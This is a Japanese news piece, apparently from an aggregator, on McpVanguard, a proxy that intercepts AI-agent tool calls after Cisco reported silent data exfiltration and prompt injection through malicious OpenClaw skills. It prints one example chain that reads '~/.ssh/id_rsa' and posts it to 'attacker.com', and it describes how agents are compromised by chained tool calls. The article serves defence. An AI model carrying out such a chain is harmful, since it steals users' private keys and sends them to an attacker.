McpVanguardプロキシがOpenClawスキルデータの外部流出をブロック

CiscoのAIセキュリティチームがサードパーティ製OpenClawスキルによるサイレントデータ流出とプロンプトインジェクションを発見したことを受け、開発者がMcpVanguardをリリースしました。これはAIエージェントとそのツールの間に配置され、悪意のある呼び出しが実行される前にブロックするプロキシです。
問題点:連鎖的な悪意のある呼び出し
セキュリティ上の問題はOpenClaw自体のバグではなく、エージェントがファイルシステムアクセス、シェル実行、ネットワーク呼び出しを境界制限なく行えることに起因します。Ciscoのテストでは、一見無害な個々の呼び出しが組み合わさって侵害を引き起こすパターンが明らかになりました。例えば:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)個別には悪意があるようには見えませんが、組み合わさると機密データが流出します。ソースによると、ClawHubにはピーク時に820以上の悪意のあるスキルがあり、CVE-2026-25253により攻撃者は単一の悪意のあるリンクを通じてリモートコード実行を達成できました。現在のスキルレベルの検証では、これらの連鎖的な呼び出しシーケンスを検出できません。
解決策:McpVanguardプロキシ
McpVanguardは、エージェントとそのツール間の呼び出しをインターセプトすることでこの問題に対処します。3つの検出方法を使用します:
- パターンマッチング
- 意味的意図スコアリング
- セッション全体にわたる行動連鎖検出
インストールはpip経由で行います:pip install mcp-vanguard。
深層レイヤー:VEXプロトコル
このプロジェクトには、VEXプロトコルと呼ばれるより深いセキュリティレイヤーが含まれており、「フライトレコーダー」システムと説明されています。以下を提供します:
- 改ざん検知可能なログのためのマークル監査証跡
- TPMベースのエージェントID検証
- システムコールレベルの強制実行
VEXプロトコルはRustで構築されており、開発は2023年12月に開始されました。これはOpenClawが広く普及する前のことです。ソースによると、NVIDIAは最近、同様のセキュリティ目的でNemoClawを出荷しており、この種の脅威がなくなることはないことを示しています。
両プロジェクトはGitHubで利用可能です:
📖 Read the full source: r/openclaw
👀 See Also

ClawCare:AWSキー流出後のAIコーディングエージェント向けセキュリティガード
ClawCareは、Claude CodeなどのAIコーディングエージェントで実行前にコマンドをスキャンするPythonツールで、環境変数の一括ダンプやリバースシェルなどの危険なパターンをブロックします。開発者がエージェントを通じてAWSキーを誤って漏洩したことをきっかけに開発されました。

Tailscaleを使用したOpenClawの安全なリモートアクセス
なし

OneCLI:AIエージェント向けオープンソース認証情報保管庫
OneCLIは、AIエージェントと外部サービスの間に位置するRustで書かれたオープンソースのゲートウェイで、リクエスト時に実際の認証情報を注入し、エージェントにはプレースホルダーキーのみを表示します。AES-256-GCM暗号化ストレージを提供し、組み込みのPGliteを備えた単一のDockerコンテナで動作し、HTTPS_PROXYを設定できるあらゆるエージェントフレームワークと連携します。

FORGE: LLMシステム向けオープンソースAIセキュリティテストフレームワーク
FORGEは、実行中に独自のツールを構築し、自己複製して群れを形成し、プロンプトインジェクション、ジェイルブレイクファジング、RAG漏洩などのOWASP LLM Top 10脆弱性をカバーする自律型AIセキュリティテストフレームワークです。